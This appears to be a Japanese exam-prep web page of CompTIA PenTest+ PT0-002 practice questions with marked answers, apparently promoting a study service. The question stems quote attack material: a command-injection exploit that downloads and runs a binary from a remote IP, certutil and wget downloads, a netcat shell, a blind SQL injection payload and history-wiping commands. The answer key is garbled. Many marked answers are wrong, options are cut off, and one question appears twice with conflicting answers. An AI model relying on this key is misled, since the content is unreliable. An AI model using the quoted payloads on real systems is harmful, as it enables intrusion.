すべての情報を見逃したくないですか?

認定試験に合格するためのヒント

最新の試験ニュースと割引情報

当社の専門家による厳選最新情報

はい、ニュースを送ってください

CompTIA PT0-002試験の成功:CompTIA PenTest+認定資格模擬試験と学習リソース|SPOTO

弊社の模擬試験および参考書を使ってCompTIA PenTest+ (PT0-002)認定試験に合格する準備をしましょう。試験の準備をする最もよい方法は最新の試験問題を練習することです。弊社の学習教材は模擬試験、サンプル問題、試験問題集を含んでいて、あなたが合格できるようにデザインされています。CompTIA PenTest+認定資格は、侵入テストや脆弱性管理を担当するサイバーセキュリティのプロフェッショナルに最適です。CompTIAの模擬試験や試験シミュレーターを利用することで、実際の試験状況をシミュレートし、自信を深めることができます。弊社の試験資料と回答集を利用して、PT0-002試験に対するあなたの理解と準備を強化しましょう。弊社の総合的な学習資料と模擬試験で自信を持って準備をし、試験の成功を達成しましょう。

他のオンライン試験を受ける

質問 #1
あるセキュリティ専門家が、TCPポート3011でリッスンしているプロプライエタリサービスに無効なパケットを送信して、IoTデバイスをテストしたいと考えています。セキュリティの専門家が、TCPヘッダの長さとチェックサムを、任意の数値を使って簡単かつプログラム的に操作し、プロプライエタリ・サービスがどのように応答するかを観察できるようになるのは、次のうちどれでしょうか?
A. Nmap
B. tcpdump
C. スキャピー
D. hping3
回答を見る
正解: C
質問 #2
ある侵入テスト実施者は、デフォルト設定のWindowsサーバー上で低特権シェルを入手し、現在、設定ミスのサービス権限を悪用する能力を調査しようとしている。次のコマンドのどれが、テスト者がこのプロセスを開始するのに役立つか?
A. certutil -urlcache -split -f http://192
B. powershell (New-Object System
C. schtasks /query /fo LIST /v | find /I "次の実行時間:"
D. wget http://192
回答を見る
正解: A
質問 #3
ある侵入テスト実施者がシステムにアクセスし、永続性を確立した後、次のコマンドを実行する: cat /dev/null > temp touch -r .bash_history temp mv temp .bash_history テスト実施者が最も実行しそうなアクションはどれか。
A. Bashの履歴を/dev/nullにリダイレクトする
B. さらに列挙するために、ユーザーのBash履歴のコピーを作成する。
C. Bashの履歴を消去して痕跡を消す
D. システム上におとりファイルを作成し、インシデント対応者を混乱させる。
回答を見る
正解: A
質問 #4
あるセキュリティエンジニアが、ネットワーク上の新しいサーバを特定し、そのホストをスキャンして、そのホストが承認されたバージョンのLinuxとパッチが適用されたバージョンのApacheを実行しているかどうかを判断しようとしている。このタスクを達成するコマンドはどれか。
A. nmap -f -sV -p80 192
B. nmap -sS -sL -p80 192
C. nmap -A -T4 -p80 192
D. nmap -O -v -p80 192
回答を見る
正解: A
質問 #5
次のコードがあるとする: この種の攻撃を防ぐための最善の方法はどれか。(2つ選びなさい)
A. ウェブアプリケーションファイアウォール
B. パラメータ化されたクエリ
C. 出力エンコーディング
D. セッション・トークン
E. 入力検証
F. Base64エンコーディング
回答を見る
正解: BE
質問 #6
あるペネトレーション・テスターが最近、ある企業環境内のコア・ネットワーク・デバイスのセキュリティー・レビューを完了した。主な調査結果は以下のとおりである:(cid:127)ネットワークデバイスに向かう以下のリクエストが傍受された:GET /login HTTP/1.1 Host: 10.50.100.16 User-Agent:Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Authorization:Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk (cid:127) ネットワーク管理インターフェイスは利用可能です。
A. パスワードの複雑性要件を強化する。
B. SSHデーモンを無効にするか、アップグレードします。
C. HTTP/301リダイレクト設定を無効にします。
D. 管理用の帯域外ネットワークを作成する。
E. より良い認証方法を導入する。
F. ネットワーク管理および制御インターフェースを排除する。
回答を見る
正解: CD
質問 #7
ある会社が、従業員に対するソーシャル・エンジニアリング・テストを行うために侵入テス ターを雇った。テスターはその会社のウェブサイト上で従業員の電話番号を見つけられなかったが、数カ月前に電話番号の完全なカタログが公開されたことを知った。
A. ウェブアーカイブ
B. ギットハブ
C. ファイルのメタデータ
D. 地下フォーラム
回答を見る
正解: A
質問 #8
ある役員が出張中にWi-Fiを使って会社のサーバーに接続する必要がある。利用可能なWi-Fi接続を探していたところ、役員が滞在している場所では利用できないホテルチェーンのアクセスポイントがあることに気づきました。この役員が経験している可能性が最も高い攻撃は次のどれでしょうか?
A. データの修正
B. 増幅
C. キャプティブ・ポータル
D. 邪悪な双子
回答を見る
正解: D
質問 #9
保護されていないネットワーク・ファイル・レポジトリで、侵入テスト実施者が、ユーザー名とパスワー ドを平文で含むテキストファイルと、フルネーム、役割、シリアル番号など、従業員50人分のデータ を含むスプレッドシートを発見した。テスト者は、テキストファイルのパスワードの一部が次のような形式になっていることに気づく:<この情報を使ってテスト者が次に取るべき行動として、最も適切なものはどれか。
A. パスワードスプレーテストの準備として、カスタムパスワード辞書を作成する。
B. パスワードを安全に保存するために、テキストファイルの代わりにパスワードマネージャ/ボールトを使用することを推奨する。
C. すべてのシステムとアプリケーションにパスワードの複雑性ルールを設定することを推奨する。
D. 保護されていないファイルリポジトリを、侵入テスト報告書の所見として文書化する。
回答を見る
正解: D
質問 #10
ある侵入テスト実施者が、無線セキュリティのレビューを請け負った。このテスト者は、ターゲットとなる企業のWiFiの設定を模倣した悪意のあるワイヤレスAPを配備した。侵入テスト者は今、近くの無線ステーションを悪意のあるAPに強制的に接続させたいと考えています。テスト者が次に取るべき手順はどれか。
A. 認証解除フレームをステーションに送信する。
B. 2
C. 悪意のあるAPが動的周波数選択チャネル内でブロードキャストするように設定する。
D. 事前共有キーを使用しないように、悪意のあるAP設定を変更する。
回答を見る
正解: B
質問 #11
ある侵入テスト実施者が侵入テストを行っていたところ、ネットワーク・トラフィックがクライアントのIPアドレスに届かなくなっていることを発見した。侵入テスト実施者は後に、SOCが侵入テスト実施者のIPアドレスにsinkholingを使用していたことを発見しました。次のうち、何が起こったかを最もよく表しているものはどれですか。
A. 侵入テスト実施者が間違った資産をテストしていた
B. プランニングの過程で、全チームに確実に通知することができなかった。
C. クライアントが査定開始の準備ができていなかった
D. 侵入テスト実施者の連絡先が間違っていた
回答を見る
正解: C
質問 #12
インターネットに直接接続されたloTデバイスに関連する最も一般的な脆弱性はどれか?IoT デバイスは、多くの場合、発見が容易で広く知られているデフォルトのパスワードで出荷されています。多くのユーザーはこれらのデフォルトの認証情報を変更せず、デバイスを不正アクセスに対して脆弱なままにしています。この問題は、インターネットに直接接続されたIoTデバイスに関連する最も一般的な脆弱性の1つです。攻撃者は、このようなデフォルト・パスワードを悪用することで、IoTデバイスに不正アクセスすることができます。
A. サポートされていないオペレーティングシステム。
B. DDoS攻撃を受けやすい。
C. ネットワークができない。
D. デフォルトパスワードの存在
回答を見る
正解: D
質問 #13
ある侵入テスト実施者がサーバーの脆弱性を悪用し、リモートでペイロードを実行してシェルを取得した。しかし、接続は確立されず、ペイロードの実行時にエラーは表示されませんでした。侵入テスト実施者は、IPS や次世代ファイアウォールのようなネットワークデバイスが接続を切断していることを疑いました。次のペイロードのうち、シェルの確立に成功する可能性が最も高いものはどれですか?
A. windows/x64/meterpreter/reverse_tcp
B. windows/x64/meterpreter/reverse_http
C. windows/x64/shell_reverse_tcp
D. windows/x64/powershell_reverse_tcp
E. windows/x64/meterpreter/reverse_https
回答を見る
正解: D
質問 #14
Pythonの次の式のうち、変数valを1増やすものはどれか(2つ選べ)。
A. val++
B. +val
C. val=(val+1)
D. ++val
E. val=val++
F. val+=1
回答を見る
正解: C
質問 #15
次の Web アプリケーションのセキュリティリスクのうち、OWASP Top 10 v2017 に含まれているものはどれですか?(2つ選んでください)
A. バッファ・オーバーフロー
B. クロスサイトスクリプティング
C. コンディション攻撃
D. ゼロデイ攻撃
E. 射出欠陥
F. ランサムウェア攻撃
回答を見る
正解: C
質問 #16
ある侵入テスト者は、Linux ベースのファイルサーバーへの root アクセスを取得し、再起動後も永続性を維持したいと考えています。この目的を最もよくサポートする技術はどれか。
A. リバースシェルを確立するためにワンショットのsystemdサービスを作成する。
B. etc/shadowを取得し、rootパスワードをブルートフォースする。
C. Run nc -e /bin/sh<
D. 横方向に移動し、LDAP上にユーザーアカウントを作成する。
回答を見る
正解: B
質問 #17
ペネトレーション・テストにおいて、コミュニケーションが重要なフェーズである理由を最も適切に説明しているのは、次のうちどれでしょうか。コミュニケーションは、関係者全員がテストの進捗状況、発見事項、及び、事業運営への潜在的な影響を確実に認識するために、侵入テストにおいて重要な段階である。状況認識について話し合うことで、セキュリティ体制、発見された脆弱性、潜在的なリスクに関するリアルタイムの洞察を共有する。これによって、組織は十分な情報に基づいた意思決定を行い、リスクを迅速に軽減し、セキュリティ対策を確実に実施することができる。
A. 状況認識について話し合うこと。
B. 緊急連絡先と信頼関係を築く。
C. データ破棄のプロセスを説明すること。
D. 将来的な評価の可能性を確保する。
回答を見る
正解: A
質問 #18
ある侵入テスト者が、パブリッククラウドプロバイダによってホストされているウェブアプリケーションをテストしている。テスト者はプロバイダのメタデータを照会し、インスタンスが自身を認証するために使用する認証情報を取得することができます。このテスト者が悪用した脆弱性はどれか?
A. クロスサイト・リクエスト・フォージェリ
B. サーバサイドリクエストフォージェリ
C. リモートファイルインクルード
D. ローカルコードの組み込み
回答を見る
正解: B
質問 #19
ある侵入テスト実施者がディスカバリースキャンを実施し、以下の結果を生成した:次のコマンドのどれが上記の結果を生成し、さらに分析するためにアクティブなホストのリストに変換しますか?
A. nmap -oG list
B. nmap -sn 192
C. nmap --open 192
D. nmap -o 192
回答を見る
正解: AC
質問 #20
次のうち、OWASPトップ10を最もよく表しているものはどれか(2つ選んでください)。
A. ウェブアプリケーションの最も重大なリスク
B. ウェブアプリケーションのリスク一覧
C. 重要性の高い順に定義されたリスク
D. ウェブアプリケーションのセキュリティ基準
E. リスク・ガバナンスとコンプライアンスの枠組み
F. Apacheの脆弱性のチェックリスト
回答を見る
正解: D
質問 #21
あるクライアントが、セキュリティ評価会社に、自社のホット・サイトに対する侵入テストを実施させたいと考えている。テストの目的は、事業継続の中断を防ぐ防御の有効性を判断することです。この種の評価を開始する前に取るべき行動として、最も重要なものはどれか。
A. クライアントがSOWに署名していることを確認する。
B. クライアントがホットサイトへのネットワークアクセスを許可していることを確認する。
C. フェイルオーバー環境がクライアントが所有していないリソースに依存しているかどうかを判断します。
D. 顧客とのコミュニケーションとエスカレーション手順を確立する。
回答を見る
正解: A
質問 #22
ある侵入テスト実施者が、あるクライアントとの契約に先立ち、以下のSOWを検討している:「ネットワーク図、論理的及び物理的な資産目録、並びに従業員の名前は、顧客の機密事項として扱われる。ネットワーク図、論理的および物理的な資産目録、従業員の名前は、顧客の機密として扱われる。SOWの情報に基づくと、次のどの動作になります。
A. 監査および検査のために、一般または顧客が利用できない独自の侵入テストツールを利用すること。
B. 公開鍵暗号を活用し、エンゲージメント完了時に調査結果が CISO に確実に届くようにする。
C. クライアントのシニア・リーダーシップ・チームを喜ばせるために、クライアントのアーキテクチャに存在する重大な脆弱性をクライアントと共有しなかった。
D. クライアントの公開IPアドレスを共有することで、アンダーグラウンドのハッカー・フォーラムに協力を求める。
E. ソフトウェアベースの消去ツールを使って、侵入検査者のノートパソコンから顧客の調査結果を消去する。
F. 営業チームが将来の契約を計画できるように、SOWを将来使用するために、侵入テスト実施者の会社内に保持すること。
回答を見る
正解: CD
質問 #23
SCADA機器のある環境に対してペネトレーションテストを実施することは、さらなる安全上のリスクをもたらす:
A. デバイスはより多くの熱を発生し、より多くの電力を消費する。
B. 機器が古くなり、交換できなくなった。
C. プロトコルを理解するのはより難しい。
D. デバイスは物理的な世界への影響を引き起こす可能性がある。
回答を見る
正解: D
質問 #24
ある侵入テスト実施者は、dirbユーティリティを使用してウェブサーバをスキャンした後、以下の結果を得た: ... GENERATED WORDS: 4612 ---- スキャンURL: http://10.2.10.13/ ---- + http://10.2.10.13/about (CODE:200|SIZE:1520) + http://10.2.10.13/home.html (CODE:200|SIZE:214) + http://10.2.10.13/index.html (CODE:200|SIZE:214) + http://10.2.10.13/info (CODE:200|SIZE:214) ...DOWNLOADED: 4612 - FOUND: 4 次の要素のうち、侵入テスト者にとって有用な情報が含まれている可能性が最も高いのはどれですか?
A. index
B. about C
回答を見る
正解: AC
質問 #25
あるペネトレーション・テスターが最近、ある企業環境内のコア・ネットワーク・デバイスのセキュリティー・レビューを完了した。主な調査結果は以下の通りである:ネットワーク・デバイスに向かう以下のリクエストが傍受された:GET /login HTTP/1.1 Host: 10.50.100.16 User-Agent:Mozilla/5.0 (X11; Linux x86_64; rv:31.0)Gecko/20100101 Firefox/31.0 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Authorization:Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk ネットワーク管理インターフェイスは、本番環境で利用可能です。
A. パスワードの複雑性要件を強化する。
B. SSHデーモンを無効にするか、アップグレードします。
C. HTTP/301リダイレクト設定を無効にする。
D. 管理用の帯域外ネットワークを作成する。
E. より良い認証方法を導入する。
F. ネットワーク管理および制御インターフェースを排除する。
回答を見る
正解: AE
質問 #26
ある侵入テスト実施者が、ある業務で使用する次のスクリプトを作成しました:このスクリプトが実行するアクションは次のどれですか。
A. 開いているポートを探す。
B. リバースシェルを聴く。
C. オープンポートのフラッディングを試みる。
D. 暗号化トンネルを作成する。
回答を見る
正解: A
質問 #27
ある侵入テスト実施者が、ウェブサイトで発見された検索フォームの入力検証をテストしています。次の文字のうち、ウェブサイトの脆弱性をテストするための最良の選択肢はどれか。
A. コンマ
B. ダブルダッシュ
C. シングルクォート
D. セミコロン
回答を見る
正解: C
質問 #28
ある侵入テスト実施者が、以下のペイロードを使用して脆弱性を悪用した:IF (1=1) WAIT FOR DELAY '0:0:15' このタイプの攻撃を最も軽減できるアクションはどれか?侵入テスト担当者が使用したペイロードは、ブラインド SQL インジェクション攻撃の一種であり、条件が真の場合、データベースの応答を 15 秒遅らせる。これは、一連の真か偽の質問をすることで、データベースから情報を引き出すために使用できます。この種の攻撃を防ぐためのベストプラクティスは
A. パスワードを暗号化する。
B. クエリのパラメータ化
C. エンコード出力。
D. HTMLのサニタイズ
回答を見る
正解: B
質問 #29
ある侵入テスト者は、検知されずに偵察を行いたいと考えている。次の活動のうち、発見される可能性が最も低いものはどれですか?(2つ選んでください)。
A. オープンソースリサーチ
B. Pingスイープ C
E. 脆弱性スキャン
F. Nmapスキャン
回答を見る
正解: B
質問 #30
新しいセキュリティー会社が最初のクライアントに乗り込む。そのクライアントは週末にしかテストを許可せず、月曜日の朝に結果を必要としていた。しかし、アセスメントチームは月曜日まで環境にアクセスできませんでした。アセスメントを開始する前に、セキュリティ会社が入手しておくべきものはどれか?
A. 署名された業務明細書
B. 正しいユーザーアカウントと関連パスワード C
回答を見る
正解: B
質問 #31
次のような出力がある:User-agent:* Disallow:/author/ Disallow:Disallow: /author/ Disallow: /xmlrpc.php Disallow: /wp-admin/wp-admin Disallow:/page/ この出力は、次のどの活動中に得られた可能性が最も高いですか?
A. ウェブサイトのスクレイピング
B. ウェブサイトのクローン
C. ドメイン列挙
D. URL列挙
回答を見る
正解: CF
質問 #32
ある顧客組織のアセスメントにおいて、侵入テスト実施者は、多数の古いバージョンのソフトウェアパッケージがインストールされていることに気づきました。この問題を軽減する最善の方法はどれか。この問題を軽減する最善の方法は、パッチ適用と変更管理プログラムを実施することである。これは、脆弱性、バグ、またはパフォーマンスの問題に対処するために、ソフトウェアパッケージに更新または修正を適用し、ソフトウェアに加えられた変更を管理または文書化するプロセスである。
A. パッチ適用および変更管理プログラムの実施。
B. システムアップデートの実行に使用されるクライアントスクリプトの改訂。
C. クライアントのシステム管理者に対する改善トレーニング。
D. 品質保証が承認するまで、システムのパッチを当てることを控えること。
回答を見る
正解: A
質問 #33
ある侵入テスト実施者が、あるクライアントのために、会社の業務に最小限の混乱しか与えないような活動を行う準備をしています。次のうち、受動的な偵察ツールとみなされるものはどれですか。(2つ選びなさい。) A.Wireshark
B. ネサス
C. 網膜
D. バープ・スイート
E. 初段
F. ニクト
回答を見る
正解: AC
質問 #34
文字列の値を別の文字列に追加することを呼ぶ:
A. 編集
B. コネクション
C. 連結
D. 接続
回答を見る
正解: A
質問 #35
ある企業が、企業のSSOポータルを模倣したサイトへのリンクを含む電子メールを従業員に送信し、フィッシング攻撃のシミュレーションを行った。電子メールを受け取った従業員の80%がリンクをクリックし、偽のサイトで企業認証情報を提供しました。この状況に対処するための推奨事項として、最も適切なものはどれか。
A. 全ユーザを対象としたサイバーセキュリティ意識教育プログラムを定期的に実施する。
B. すべての企業アプリケーションに多要素認証を導入する。
C. 企業プロキシで承認されていないサイトのリストを定義することにより、従業員のウェブ閲覧を制限する。
D. Eメールセキュリティゲートウェイを導入し、Eメール通信からスパムやマルウェアをブロックする。
回答を見る
正解: A
質問 #36
あるペネトレーション・テスターが、エクスプロイトを使ってシステムにアクセスすることができた。以下は、利用されたコードのスニペットです: exploit = "POST " exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS}- c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${I FS}./apache'%0A%27&loginUser=a&Pwd=a" exploit += "HTTP/1.1" 侵入テスト者は、次のコマンドのどれを実行すべきでしょうか?
A. grep -v apache ~/
B. rm -rf /tmp/apache C
回答を見る
正解: D
質問 #37
ある侵入テストチームが、建物に侵入するための物理的な侵入テストを行っている。侵入テスト担当者が契約文書のコピーを携行すべき理由はどれか。
A. 原本紛失時のバックアップ
B. 建物の入り口から案内する
C. 顧客との請求情報の確認
D. 発見された場合の証拠
回答を見る
正解: A
質問 #38
ある企業が、製造工場のサイバーフィジカルシステムを調査するため、侵入テストチームを雇った。チームは、監視システムと PLC がともに会社のイントラネットに接続されていることを直ちに発見した。侵入テストチームが行ったと仮定した場合、最も妥当性が高いのはどれか。
A. PLCは、ネットワーク経由で注入されたコマンドには反応しません。
B. スーパーバイザーとコントローラーは、デフォルトで別の仮想ネットワーク上にあります。
C. コントローラは、コマンドの発信元を検証しません。
D. 監督システムは、コード/コマンドの悪意のある注入を検知する。
回答を見る
正解: C
質問 #39
セキュリティ評価を行っている侵入テスト実施者が、重要な脆弱性がサイバー犯罪者によって活発に悪用されていることを発見しました。次のうち、テスト者が次に行うべきことはどれですか?
A. 主な連絡先に連絡を取る
B. 攻撃者を倒そうとする
C. すぐに警察当局に連絡する
D. 適切な証拠を集め、最終報告書に加える
回答を見る
正解: CE
質問 #40
ある侵入テスト実施者が共有の列挙を行っており、以下の出力を受け取った: 侵入テスト実施者が次に列挙すべきものはどれか?表示された出力は、smbclientやenum4linuxのようなツールを使用して、SMB(Server Message Block)プロトコルを使用するシステム上の共有ディレクトリを一覧表示したときに表示される典型的なものである。print$-この共有は、一般的にプリンタードライバーに使用される。 2. home - ユーザーのホーム・ディレクター。
A. デヴェロップ
B. print$
C. home。
D. 注釈
回答を見る
正解: A
質問 #41
ある侵入テスト者が未知の環境テスト中にping -Aコマンドを実行したところ、128 TTLのパケットが返ってきた。このタイプのパケットを返す可能性が最も高いOSはどれか?
A. 窓
B. アップル
C. リナックス
D. アンドロイド
回答を見る
正解: A
質問 #42
侵入テスト実施者の具体的な活動、成果物、スケジュールを記述した文書はどれか。
A. NDA
B. MSA
C. SOW
D. 覚書
回答を見る
正解: C
質問 #43
会社から依頼された評価を行っている侵入テスト者は、二重タグ付けを使って別のシステムにトラフィックを送りたいと考えています。この目標を達成するのに最も適したテクニックはどれでしょうか?
A. RFIDクローニング
B. RFIDタグ
C. メタタグ
D. タグネスティング
回答を見る
正解: D
質問 #44
侵入テストツールの入力としてスクリプトやプログラムに入力できる英数字データを保存するために使用できるのは、次のうちどれですか?
A. 辞書
B. ディレクトリ
C. シンボリンク
D. カタログ
E. ループ
回答を見る
正解: A
質問 #45
次のPowerShellスニペットは、攻撃者マシンのログから抽出されました:侵入テスト担当者は、配列の存在を特定したいと考えています。次の行番号のどれが配列を定義しますか?
A. 8行目
B. 13行目
C. 19番線
D. 20番線
回答を見る
正解: A
質問 #46
アプリケーション・コードでサードパーティのオープンソース・ライブラリを使用する際の最も大きな懸念事項はどれですか?(2つ選んでください)
A. 図書館は脆弱かもしれない
B. ソフトウェアのライセンスがあいまい C
E. ライブラリがサポートされていない可能性がある。
F. ライブラリはアプリケーションを壊すかもしれない
回答を見る
正解: B
質問 #47
あるコンサルタントは、断続的な接続の問題が報告された後、以下の出力を確認している:?(192.168.1.1) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet] ?(192.168.1.12) at 34:a4:be:09:44:f4 on en0 ifscope [ethernet] ?(192.168.1.17) on en0 92:60:29:12:ac:d2 ifscope [ethernet] ?(192.168.1.34) on en0 の 88:de:a9:12:ce:fb ifscope [ethernet] ?(192.168.1.136) on en0 0a:d1:fa:b1:01:67 ifscope [ethernet] ?(192.168.1.255) on en0 ifscope [ethernet] ?(224.0.0.251) at 01:02:5e:7
A. ネットワーク上のデバイスが、間違ったサブネットにIPアドレスを持っている。
B. マルチキャストセッションが間違ったマルチキャストグループを使って開始された。
C. ARPフラッディング攻撃は、DDoSを実行するためにブロードキャストアドレスを使用します。
D. ネットワーク上のデバイスがARPキャッシュを汚染した。
回答を見る
正解: AE

送信後に回答を表示する

質問の回答を得るには、電子メールと WhatsApp を送信してください。

注: 正しい試験結果を得ることができるように、電子メール ID と WhatsApp が有効であることを確認してください。

Eメール:
WhatsApp/電話番号: